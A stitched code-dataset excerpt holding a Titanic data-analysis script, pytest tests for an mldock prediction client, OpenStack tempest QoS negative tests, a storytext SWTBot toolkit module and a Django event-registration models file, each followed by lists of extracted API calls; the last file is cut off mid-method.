] | [((1110, 1129), 'time.sleep', 'time.sleep', (['seconds'], {}), '(seconds)\n', (1120, 1129), False, 'import time\n'), ((6041, 6059), 'requests.Session', 'requests.Session', ([], {}), '()\n', (6057, 6059), False, 'import requests\n'), ((5525, 5550), 'operator.itemgetter', 'itemgetter', (['"""media_count"""'], {}), "('media_count')\n", (5535, 5550), False, 'from operator import itemgetter\n'), ((14462, 14502), 'datetime.datetime.strptime', 'datetime.strptime', (['since', '"""%Y%m%d%H%M%S"""'], {}), "(since, '%Y%m%d%H%M%S')\n", (14479, 14502), False, 'from datetime import datetime\n'), ((14701, 14741), 'datetime.datetime.strptime', 'datetime.strptime', (['until', '"""%Y%m%d%H%M%S"""'], {}), "(until, '%Y%m%d%H%M%S')\n", (14718, 14741), False, 'from datetime import datetime\n'), ((20250, 20290), 'datetime.datetime.strptime', 'datetime.strptime', (['since', '"""%Y%m%d%H%M%S"""'], {}), "(since, '%Y%m%d%H%M%S')\n", (20267, 20290), False, 'from datetime import datetime\n'), ((20489, 20529), 'datetime.datetime.strptime', 'datetime.strptime', (['until', '"""%Y%m%d%H%M%S"""'], {}), "(until, '%Y%m%d%H%M%S')\n", (20506, 20529), False, 'from datetime import datetime\n'), ((23022, 23029), 'pyinstagram.model.Media', 'Media', ([], {}), '()\n', (23027, 23029), False, 'from pyinstagram.model import Media\n'), ((16730, 16752), 'random.randint', 'random.randint', (['(10)', '(60)'], {}), '(10, 60)\n', (16744, 16752), False, 'import random\n'), ((24171, 24193), 'random.randint', 'random.randint', (['(10)', '(60)'], {}), '(10, 60)\n', (24185, 24193), False, 'import random\n')] |
import ImportTitanicData
import DataPreparation
# analiza danych przed preparacją danych
class DataAnaliysisBefore():
def showTrain(self):
importData = ImportTitanicData.DataImport()
train = importData.importTrain()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
importData = ImportTitanicData.DataImport()
test = importData.importTest()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
# analiza danych po preparacji danych
class DataAnaliysisAfter():
def showTrain(self):
dataPreparation = DataPreparation.DataPreparation()
train = dataPreparation.prepareTrainData()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
dataPreparation = DataPreparation.DataPreparation()
test = dataPreparation.prepareTestData()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
#
#
# def showTest(self):
# test = ImportTitanicData.DataImport.importTest()
# return test.head()
# def showTest ()
# dataAnaysis = DataAnaliysisBefore()
dataAnaysis = DataAnaliysisAfter()
# print('czesio')
# print('Analiza danych przed wypełnieniem NaN')
# print('Tabela Train\n', dataAnaysis.showTrain())
# print('\n\nshape Train\n', dataAnaysis.shapeTrain())
# print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
print('Analiza danych po wypełnieniem NaN i preparacji danych')
print('Tabela Train\n', dataAnaysis.showTrain())
print('\n\nshape Train\n', dataAnaysis.shapeTrain())
print('\n\ndtypes Train\n', dataAnaysis.dtypesTrain())
# dataPreparation = DataPreparation.DataPreparation()
# print(dataPreparation.prepareTrainData().to_string())
| [
"ImportTitanicData.DataImport",
"DataPreparation.DataPreparation"
] | [((165, 195), 'ImportTitanicData.DataImport', 'ImportTitanicData.DataImport', ([], {}), '()\n', (193, 195), False, 'import ImportTitanicData\n'), ((436, 466), 'ImportTitanicData.DataImport', 'ImportTitanicData.DataImport', ([], {}), '()\n', (464, 466), False, 'import ImportTitanicData\n'), ((772, 805), 'DataPreparation.DataPreparation', 'DataPreparation.DataPreparation', ([], {}), '()\n', (803, 805), False, 'import DataPreparation\n'), ((1061, 1094), 'DataPreparation.DataPreparation', 'DataPreparation.DataPreparation', ([], {}), '()\n', (1092, 1094), False, 'import DataPreparation\n')] |
"""Test Predict API calls"""
import io
from PIL import Image
from dataclasses import dataclass
import tempfile
from pathlib import Path
import pytest
from mock import patch
from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction
import responses
import requests
@pytest.fixture
def image_bytes():
"""reads image as bytes string"""
img = Image.open("tests/api/fixtures/eight.png", mode="r")
img_byte_arr = io.BytesIO()
img.save(img_byte_arr, format="PNG")
return img_byte_arr.getvalue()
@dataclass
class MockResponse:
status_code: int
json_data: dict = None
text: str = None
_content: bytes = None
def json(self):
return self.json_data
class TestPredictAPI:
    """
    TEST ERROR STATUS_CODE!=200 SCENERIO
    """
    # Error-path tests: a non-200 reply from the stubbed model server must
    # surface to the caller as requests.exceptions.RequestException.
    @staticmethod
    @responses.activate
    def test_handle_prediction_send_json_handles_non_200():
        # Stub the invocations endpoint to always answer 404.
        responses.add(
            responses.POST,
            "http://nothing-to-see-here/invocations",
            json={"error": "client error"},
            status=404,
        )
        with pytest.raises(requests.exceptions.RequestException):
            _ = handle_prediction(
                host="http://nothing-to-see-here/invocations",
                request="tests/api/fixtures/payload.json",
                response_file=None,
                request_content_type="application/json",
                response_content_type="application/json",
            )
    @staticmethod
    @responses.activate
    def test_handle_prediction_sending_image_jpeg_handles_non_200():
        # Same 404 scenario, but with a JPEG request payload.
        responses.add(
            responses.POST,
            "http://nothing-to-see-here/invocations",
            json={"error": "client error"},
            status=404,
        )
        with pytest.raises(requests.exceptions.RequestException):
            _ = handle_prediction(
                host="http://nothing-to-see-here/invocations",
                request="tests/api/fixtures/eight.png",
                response_file=None,
                request_content_type="image/jpeg",
                response_content_type="application/json",
            )
    @staticmethod
    @responses.activate
    def test_handle_prediction_sending_text_csv_handles_non_200():
        # Same 404 scenario, but with a CSV request payload.
        responses.add(
            responses.POST,
            "http://nothing-to-see-here/invocations",
            json={"error": "client error"},
            status=404,
        )
        with pytest.raises(requests.exceptions.RequestException):
            _ = handle_prediction(
                host="http://nothing-to-see-here/invocations",
                request="tests/api/fixtures/payload.csv",
                response_file=None,
                request_content_type="text/csv",
                response_content_type="application/json",
            )
    """
    TEST SUCCESS STATUS_CODE=200 SCENERIO
    """
    # Success-path tests: execute_request is mocked out, and each test
    # inspects the url/headers/data that handle_prediction forwarded to it.
    @staticmethod
    def test_handle_prediction_send_json_success_200():
        with patch("mldock.api.predict.execute_request") as mock_execute_request:
            mock_execute_request.return_value = MockResponse(
                json_data={"result": "success"}, status_code=200
            )
            _ = handle_prediction(
                host="http://nothing-to-see-here/invocations",
                request="tests/api/fixtures/payload.json",
                response_file=None,
                request_content_type="application/json",
                response_content_type="application/json",
            )
            validation_kwargs = {
                "url": "http://nothing-to-see-here/invocations",
                "headers": {"Content-Type": "application/json"},
            }
            # call_args unpacks to (positional args, keyword args).
            _, kwargs = list(mock_execute_request.call_args)
            data_obj = kwargs.pop("data")
            assert (
                kwargs == validation_kwargs
            ), "Failure. URL and Headers are incorrect."
            assert isinstance(data_obj, str), "Failure. Expected str json object."
    @staticmethod
    def test_handle_prediction_sending_image_jpeg_success_200(image_bytes):
        with patch("mldock.api.predict.execute_request") as mock_execute_request:
            mock_execute_request.return_value = MockResponse(
                _content=image_bytes, status_code=200
            )
            _ = handle_prediction(
                host="http://nothing-to-see-here/invocations",
                request="tests/api/fixtures/eight.png",
                response_file=None,
                request_content_type="image/jpeg",
                response_content_type="image/jpeg",
            )
            validation_kwargs = {
                "url": "http://nothing-to-see-here/invocations",
                "headers": {"Content-Type": "image/jpeg"},
            }
            _, kwargs = list(mock_execute_request.call_args)
            data_obj = kwargs.pop("data")
            assert (
                kwargs == validation_kwargs
            ), "Failure. URL and Headers are incorrect."
            # Binary payloads are expected to be sent as a BytesIO stream.
            assert isinstance(
                data_obj, io.BytesIO
            ), "Failure. Expected io.BytesIO object."
    @staticmethod
    def test_handle_prediction_sending_text_csv_success_200():
        with patch("mldock.api.predict.execute_request") as mock_execute_request:
            mock_execute_request.return_value = MockResponse(
                text="greet,name\nhello,sam", status_code=200
            )
            _ = handle_prediction(
                host="http://nothing-to-see-here/invocations",
                request="tests/api/fixtures/payload.csv",
                response_file=None,
                request_content_type="text/csv",
                response_content_type="text/csv",
            )
            validation_kwargs = {
                "url": "http://nothing-to-see-here/invocations",
                "headers": {"Content-Type": "text/csv"},
            }
            _, kwargs = list(mock_execute_request.call_args)
            data_obj = kwargs.pop("data")
            assert (
                kwargs == validation_kwargs
            ), "Failure. URL and Headers are incorrect."
            assert isinstance(data_obj, str), "Failure. Expected str json object."
    """
    TEST WRITING RESPONSE TO FILE SCENERIO
    """
    # File-output tests: when response_file is given, the (mocked)
    # response body must end up written to that path.
    @staticmethod
    def test_handle_prediction_send_json_success_write_response_file():
        with tempfile.TemporaryDirectory() as tmp_dir:
            response_filepath = Path(tmp_dir, "response.json")
            with patch("mldock.api.predict.execute_request") as mock_execute_request:
                mock_execute_request.return_value = MockResponse(
                    json_data={"result": "success"}, status_code=200
                )
                _ = handle_prediction(
                    host="http://nothing-to-see-here/invocations",
                    request="tests/api/fixtures/payload.json",
                    response_file=response_filepath,
                    request_content_type="application/json",
                    response_content_type="application/json",
                )
            assert (
                response_filepath.is_file()
            ), "Failure. outputfile was not created"
    @staticmethod
    def test_handle_prediction_sending_image_jpeg_success_write_response_file(
        image_bytes,
    ):
        with tempfile.TemporaryDirectory() as tmp_dir:
            response_filepath = Path(tmp_dir, "response.png")
            with patch("mldock.api.predict.execute_request") as mock_execute_request:
                mock_execute_request.return_value = MockResponse(
                    _content=image_bytes, status_code=200
                )
                _ = handle_prediction(
                    host="http://nothing-to-see-here/invocations",
                    request="tests/api/fixtures/eight.png",
                    response_file=response_filepath,
                    request_content_type="image/jpeg",
                    response_content_type="image/jpeg",
                )
            assert (
                response_filepath.is_file()
            ), "Failure. outputfile was not created"
    @staticmethod
    def test_handle_prediction_sending_text_csv_success_write_response_file():
        with tempfile.TemporaryDirectory() as tmp_dir:
            response_filepath = Path(tmp_dir, "response.csv")
            with patch("mldock.api.predict.execute_request") as mock_execute_request:
                mock_execute_request.return_value = MockResponse(
                    text="greet,name\nhello,sam", status_code=200
                )
                _ = handle_prediction(
                    host="http://nothing-to-see-here/invocations",
                    request="tests/api/fixtures/payload.csv",
                    response_file=response_filepath,
                    request_content_type="text/csv",
                    response_content_type="text/csv",
                )
            assert (
                response_filepath.is_file()
            ), "Failure. outputfile was not created"
    """
    TEST ADDING ADDTIONAL HEADERS
    """
    # Extra caller-supplied headers must be merged with the Content-Type.
    @staticmethod
    def test_handle_prediction_send_json_success_add_headers():
        with patch("mldock.api.predict.execute_request") as mock_execute_request:
            mock_execute_request.return_value = MockResponse(
                json_data={"result": "success"}, status_code=200
            )
            _ = handle_prediction(
                host="http://nothing-to-see-here/invocations",
                request="tests/api/fixtures/payload.json",
                response_file=None,
                request_content_type="application/json",
                response_content_type="application/json",
                headers={"Authentication": "bearer 12345"},
            )
            validation_kwargs = {
                "url": "http://nothing-to-see-here/invocations",
                "headers": {
                    "Content-Type": "application/json",
                    "Authentication": "bearer 12345",
                },
            }
            _, kwargs = list(mock_execute_request.call_args)
            kwargs.pop("data")
            assert (
                kwargs == validation_kwargs
            ), "Failure. URL and Headers are incorrect."
| [
"tempfile.TemporaryDirectory",
"PIL.Image.open",
"mldock.api.predict.handle_prediction",
"mock.patch",
"pathlib.Path",
"io.BytesIO",
"responses.add",
"pytest.raises"
] | [((379, 431), 'PIL.Image.open', 'Image.open', (['"""tests/api/fixtures/eight.png"""'], {'mode': '"""r"""'}), "('tests/api/fixtures/eight.png', mode='r')\n", (389, 431), False, 'from PIL import Image\n'), ((451, 463), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (461, 463), False, 'import io\n'), ((915, 1034), 'responses.add', 'responses.add', (['responses.POST', '"""http://nothing-to-see-here/invocations"""'], {'json': "{'error': 'client error'}", 'status': '(404)'}), "(responses.POST, 'http://nothing-to-see-here/invocations',\n json={'error': 'client error'}, status=404)\n", (928, 1034), False, 'import responses\n'), ((1599, 1718), 'responses.add', 'responses.add', (['responses.POST', '"""http://nothing-to-see-here/invocations"""'], {'json': "{'error': 'client error'}", 'status': '(404)'}), "(responses.POST, 'http://nothing-to-see-here/invocations',\n json={'error': 'client error'}, status=404)\n", (1612, 1718), False, 'import responses\n'), ((2272, 2391), 'responses.add', 'responses.add', (['responses.POST', '"""http://nothing-to-see-here/invocations"""'], {'json': "{'error': 'client error'}", 'status': '(404)'}), "(responses.POST, 'http://nothing-to-see-here/invocations',\n json={'error': 'client error'}, status=404)\n", (2285, 2391), False, 'import responses\n'), ((1103, 1154), 'pytest.raises', 'pytest.raises', (['requests.exceptions.RequestException'], {}), '(requests.exceptions.RequestException)\n', (1116, 1154), False, 'import pytest\n'), ((1172, 1396), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'None', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=None,\n request_content_type='application/json', response_content_type=\n 'application/json')\n", 
(1189, 1396), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((1787, 1838), 'pytest.raises', 'pytest.raises', (['requests.exceptions.RequestException'], {}), '(requests.exceptions.RequestException)\n', (1800, 1838), False, 'import pytest\n'), ((1856, 2071), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/eight.png"""', 'response_file': 'None', 'request_content_type': '"""image/jpeg"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/eight.png', response_file=None,\n request_content_type='image/jpeg', response_content_type='application/json'\n )\n", (1873, 2071), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((2460, 2511), 'pytest.raises', 'pytest.raises', (['requests.exceptions.RequestException'], {}), '(requests.exceptions.RequestException)\n', (2473, 2511), False, 'import pytest\n'), ((2529, 2739), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.csv"""', 'response_file': 'None', 'request_content_type': '"""text/csv"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.csv', response_file=None,\n request_content_type='text/csv', response_content_type='application/json')\n", (2546, 2739), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((2978, 3021), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (2983, 3021), False, 'from mock import patch\n'), ((3204, 3428), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': 
'"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'None', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=None,\n request_content_type='application/json', response_content_type=\n 'application/json')\n", (3221, 3428), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((4107, 4150), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (4112, 4150), False, 'from mock import patch\n'), ((4322, 4526), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/eight.png"""', 'response_file': 'None', 'request_content_type': '"""image/jpeg"""', 'response_content_type': '"""image/jpeg"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/eight.png', response_file=None,\n request_content_type='image/jpeg', response_content_type='image/jpeg')\n", (4339, 4526), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((5229, 5272), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (5234, 5272), False, 'from mock import patch\n'), ((5452, 5654), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.csv"""', 'response_file': 'None', 'request_content_type': '"""text/csv"""', 'response_content_type': '"""text/csv"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.csv', response_file=None,\n request_content_type='text/csv', 
response_content_type='text/csv')\n", (5469, 5654), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((6390, 6419), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (6417, 6419), False, 'import tempfile\n'), ((6465, 6495), 'pathlib.Path', 'Path', (['tmp_dir', '"""response.json"""'], {}), "(tmp_dir, 'response.json')\n", (6469, 6495), False, 'from pathlib import Path\n'), ((7369, 7398), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (7396, 7398), False, 'import tempfile\n'), ((7444, 7473), 'pathlib.Path', 'Path', (['tmp_dir', '"""response.png"""'], {}), "(tmp_dir, 'response.png')\n", (7448, 7473), False, 'from pathlib import Path\n'), ((8292, 8321), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (8319, 8321), False, 'import tempfile\n'), ((8367, 8396), 'pathlib.Path', 'Path', (['tmp_dir', '"""response.csv"""'], {}), "(tmp_dir, 'response.csv')\n", (8371, 8396), False, 'from pathlib import Path\n'), ((9262, 9305), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (9267, 9305), False, 'from mock import patch\n'), ((9488, 9756), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'None', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""', 'headers': "{'Authentication': 'bearer 12345'}"}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=None,\n request_content_type='application/json', response_content_type=\n 'application/json', headers={'Authentication': 'bearer 12345'})\n", (9505, 9756), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((6513, 6556), 
'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (6518, 6556), False, 'from mock import patch\n'), ((6755, 6992), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/payload.json"""', 'response_file': 'response_filepath', 'request_content_type': '"""application/json"""', 'response_content_type': '"""application/json"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.json', response_file=response_filepath,\n request_content_type='application/json', response_content_type=\n 'application/json')\n", (6772, 6992), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((7491, 7534), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (7496, 7534), False, 'from mock import patch\n'), ((7722, 7939), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': '"""tests/api/fixtures/eight.png"""', 'response_file': 'response_filepath', 'request_content_type': '"""image/jpeg"""', 'response_content_type': '"""image/jpeg"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/eight.png', response_file=response_filepath,\n request_content_type='image/jpeg', response_content_type='image/jpeg')\n", (7739, 7939), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n'), ((8414, 8457), 'mock.patch', 'patch', (['"""mldock.api.predict.execute_request"""'], {}), "('mldock.api.predict.execute_request')\n", (8419, 8457), False, 'from mock import patch\n'), ((8653, 8868), 'mldock.api.predict.handle_prediction', 'handle_prediction', ([], {'host': '"""http://nothing-to-see-here/invocations"""', 'request': 
'"""tests/api/fixtures/payload.csv"""', 'response_file': 'response_filepath', 'request_content_type': '"""text/csv"""', 'response_content_type': '"""text/csv"""'}), "(host='http://nothing-to-see-here/invocations', request=\n 'tests/api/fixtures/payload.csv', response_file=response_filepath,\n request_content_type='text/csv', response_content_type='text/csv')\n", (8670, 8868), False, 'from mldock.api.predict import send_image_jpeg, send_csv, send_json, handle_prediction\n')] |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.db import constants as db_const
from tempest.lib import decorators
from tempest.lib import exceptions as lib_exc
from tempest import test
from neutron.tests.tempest.api import base
# Strings one character longer than the corresponding database field
# limits; the API is expected to reject these with BadRequest.
LONG_NAME_NG = 'z' * (db_const.NAME_FIELD_SIZE + 1)
LONG_DESCRIPTION_NG = 'z' * (db_const.LONG_DESCRIPTION_FIELD_SIZE + 1)
LONG_TENANT_ID_NG = 'z' * (db_const.PROJECT_ID_FIELD_SIZE + 1)
class QosNegativeTestJSON(base.BaseAdminNetworkTest):
    """Negative tests: QoS policy creation must reject over-long fields."""
    required_extensions = ['qos']
    @test.attr(type='negative')
    @decorators.idempotent_id('b9dce555-d3b3-11e5-950a-54ee757c77da')
    def test_add_policy_with_too_long_name(self):
        # Name exceeds db_const.NAME_FIELD_SIZE by one character.
        self.assertRaises(lib_exc.BadRequest,
                          self.client.create_qos_policy,
                          LONG_NAME_NG, 'test policy desc1', False)
    @test.attr(type='negative')
    @decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee747c99db')
    def test_add_policy_with_too_long_description(self):
        # Description exceeds db_const.LONG_DESCRIPTION_FIELD_SIZE by one.
        self.assertRaises(lib_exc.BadRequest,
                          self.client.create_qos_policy,
                          'test-policy', LONG_DESCRIPTION_NG, False)
    @test.attr(type='negative')
    @decorators.idempotent_id('b9dce444-d3b3-11e5-950a-54ee757c77dc')
    def test_add_policy_with_too_long_tenant_id(self):
        # Tenant id exceeds db_const.PROJECT_ID_FIELD_SIZE by one.
        self.assertRaises(lib_exc.BadRequest,
                          self.client.create_qos_policy,
                          'test-policy', 'test policy desc1',
                          False, LONG_TENANT_ID_NG)
| [
"tempest.lib.decorators.idempotent_id",
"tempest.test.attr"
] | [((1056, 1082), 'tempest.test.attr', 'test.attr', ([], {'type': '"""negative"""'}), "(type='negative')\n", (1065, 1082), False, 'from tempest import test\n'), ((1088, 1152), 'tempest.lib.decorators.idempotent_id', 'decorators.idempotent_id', (['"""b9dce555-d3b3-11e5-950a-54ee757c77da"""'], {}), "('b9dce555-d3b3-11e5-950a-54ee757c77da')\n", (1112, 1152), False, 'from tempest.lib import decorators\n'), ((1380, 1406), 'tempest.test.attr', 'test.attr', ([], {'type': '"""negative"""'}), "(type='negative')\n", (1389, 1406), False, 'from tempest import test\n'), ((1412, 1476), 'tempest.lib.decorators.idempotent_id', 'decorators.idempotent_id', (['"""b9dce444-d3b3-11e5-950a-54ee747c99db"""'], {}), "('b9dce444-d3b3-11e5-950a-54ee747c99db')\n", (1436, 1476), False, 'from tempest.lib import decorators\n'), ((1712, 1738), 'tempest.test.attr', 'test.attr', ([], {'type': '"""negative"""'}), "(type='negative')\n", (1721, 1738), False, 'from tempest import test\n'), ((1744, 1808), 'tempest.lib.decorators.idempotent_id', 'decorators.idempotent_id', (['"""b9dce444-d3b3-11e5-950a-54ee757c77dc"""'], {}), "('b9dce444-d3b3-11e5-950a-54ee757c77dc')\n", (1768, 1808), False, 'from tempest.lib import decorators\n')] |
""" Don't load any Eclipse stuff at global scope, needs to be importable previous to Eclipse starting """
from storytext import javarcptoolkit
import sys
class ScriptEngine(javarcptoolkit.ScriptEngine):
    # Specialises the RCP script engine for SWTBot/GEF-based applications.
    def createReplayer(self, universalLogging=False, **kw):
        # Use this module's replayer subclass; uiMap and recorder
        # presumably come from the base ScriptEngine — confirm.
        return UseCaseReplayer(self.uiMap, universalLogging, self.recorder, **kw)
    def getDefaultTestscriptPluginName(self):
        # Eclipse plugin id providing GEF test-script support.
        return "org.eclipse.swtbot.gef.testscript"
class UseCaseReplayer(javarcptoolkit.UseCaseReplayer):
    def getDescriberPackage(self):
        # Reuse the describer package of the base RCP replayer's module.
        return javarcptoolkit.UseCaseReplayer.__module__
    def getTestRunnerClass(self):
        # Hook point: the base class instantiates this runner class.
        return TestRunner
class TestRunner(javarcptoolkit.TestRunner):
    def initEclipsePackages(self):
        # Let the base class load the generic Eclipse/RCP packages first.
        javarcptoolkit.TestRunner.initEclipsePackages(self)
        # NOTE(review): these org.eclipse imports appear to run under
        # Jython to force the SWTBot/GEF/Draw2D Java packages to load
        # before replay starts — confirm.
        from org.eclipse.swtbot.eclipse.gef.finder import SWTGefBot
        from org.eclipse.swtbot.eclipse.gef.finder.widgets import SWTBotGefViewer
        from org.eclipse.draw2d import FigureCanvas
        from org.eclipse.draw2d.geometry import Rectangle
        from org.eclipse.gef import EditPart
| [
"storytext.javarcptoolkit.TestRunner.initEclipsePackages"
] | [((748, 799), 'storytext.javarcptoolkit.TestRunner.initEclipsePackages', 'javarcptoolkit.TestRunner.initEclipsePackages', (['self'], {}), '(self)\n', (793, 799), False, 'from storytext import javarcptoolkit\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2011,2014 <NAME> <<EMAIL>>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import datetime
import logging
import traceback
from django.core.mail import EmailMessage
from django.db import models
from django.template import Context, Template
# Module-level logger, named after this module so log output can be filtered.
logger = logging.getLogger(__name__)
# (code, display name) pairs for the local branches ("afdelingen");
# afdeling_text() maps a stored code back to its display name.
AFDELINGEN = (
    ("AMS", "Amsterdam"),
    ("AN", "Arnhem-Nijmegen"),
    ("BB", "Brabant"),
    ("FR", "Friesland"),
    ("GR", "Groningen"),
    ("LH", "Leiden-Haaglanden"),
    ("MS", "Limburg"),
    ("RD", "Rotterdam"),
    ("TW", "Overijssel"),
    ("UT", "Utrecht"),
    ("WN", "Wageningen"),
    ("INT", "Internationaal"),
)
def afdeling_text(afd):
    """Return the display name for branch code ``afd``.

    Returns ``None`` when the code is not a known branch, matching the
    behaviour of the previous linear search.

    :param afd: branch code such as ``"AMS"`` (first element of an
        ``AFDELINGEN`` pair)
    """
    # Dict lookup replaces the hand-written linear scan over the pairs.
    return dict(AFDELINGEN).get(afd)
# (storage code, label) pairs describing how an EventQuestion is rendered
# and which Answer field stores its value (see Answer.set_answer/get_answer).
QUESTION_TYPES = (
    ("INT", "Integer"),
    ("TXT", "Text Input"),
    ("AFD", "Afdeling"),
    ("BOOL", "Ja/Nee"),
    ("CHOICE", "Multiple Choice"),
    ("TEXT", "HTML Text"),
)
class Event(models.Model):
    """An event people can register for.

    Has a registration window, a base price in eurocents, and optionally
    a cap on the number of registrations.
    """

    name = models.CharField(max_length=200)
    slug = models.SlugField()
    start_registration = models.DateTimeField()
    end_registration = models.DateTimeField()
    description = models.TextField()
    contact_email = models.EmailField()
    email_template = models.TextField(help_text="Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}")
    price = models.IntegerField(help_text="Eurocenten", default=0)
    max_registrations = models.IntegerField(default=0, help_text="Als groter dan 0, bepaalt maximaal aantal inschrijvingen")

    class Meta:
        ordering = ('-end_registration',)

    def __str__(self):
        return self.name

    def subscribed(self):
        """Number of registrations for this event."""
        # COUNT(*) in the database instead of fetching all rows for len().
        return self.registrations.count()

    def paid(self):
        """Number of registrations that have been paid."""
        return self.registrations.filter(paid=True).count()

    def total_paid(self):
        """Total of paid registrations, formatted as a euro string."""
        return "\u20AC %.2f" % (sum([e.price for e in self.registrations.filter(paid=True)]) / 100.)

    def form_link(self):
        """HTML link to the public registration form (admin list column)."""
        return "<a href=\"https://events.jongedemocraten.nl/inschrijven/%s/\">Inschrijven</a>" % (self.slug)
    form_link.allow_tags = True

    def all_free(self):
        """Are all event options free?"""
        if self.price != 0:
            return False
        # EXISTS query instead of materialising the queryset for len().
        if EventOption.objects.filter(price__gt=0).filter(question__event=self).exists():
            return False
        return True

    def active(self):
        """True while the registration window is open."""
        now = datetime.datetime.now()
        return self.start_registration <= now <= self.end_registration
    # active.boolean = True

    def price_str(self):
        """Base price formatted as a euro string."""
        return "\u20AC %.2f" % (float(self.price) / 100)

    def is_full(self):
        """True when max_registrations is set and has been reached."""
        if self.max_registrations <= 0:
            return False
        return self.registrations.count() >= self.max_registrations
    is_full.boolean = True

    def get_registrations_over_limit(self):
        """Registrations beyond the event-wide cap plus those beyond any
        per-option limit (may contain duplicates across categories)."""
        results = []
        if self.max_registrations > 0:
